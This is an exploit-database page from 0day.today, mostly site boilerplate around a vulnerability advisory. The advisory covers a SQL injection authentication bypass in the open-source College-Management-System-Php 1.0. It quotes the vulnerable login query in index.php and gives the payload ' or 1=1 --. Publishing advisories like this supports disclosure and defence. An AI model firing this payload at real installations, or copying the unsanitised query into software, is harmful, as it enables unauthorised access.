0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
College-Management-System-Php 1.0 - Authentication Bypass Vulnerability
# Exploit Title: College-Management-System-Php 1.0 - Authentication Bypass / SQL Injection # Exploit Author: BLAY ABU SAFIAN (Inveteck Global) # Website: https://github.com/olotieno/College-Management-System-Php # Vendor: https://github.com/olotieno/ # Software Link: https://github.com/olotieno/College-Management-System-Php.git # Affected Version: N/A # Patched Version: unpatched # Category: Web Application # Tested on: MAC The College Management System Php suffers from sql injection vulnerabilities in the index.php page: $msg=""; if(isset($_POST['btn_log'])){ $uname=$_POST['unametxt']; $pwd=$_POST['pwdtxt']; $sql=mysqli_query($con,"SELECT * FROM users_tbl WHERE username='$uname' AND password='$pwd' SQL injection vulnerability:- in file index.php data from POST parameter 'unametxt' and 'pwdtxt' are not getting filter before passing into SQL query and hence rising SQL Injection vulnerability payload: ' or 1=1 -- Thank you regards Abu Safian Blay https://inveteckglobal.com<http://inveteckglobal.com> # 0day.today [2024-11-16] #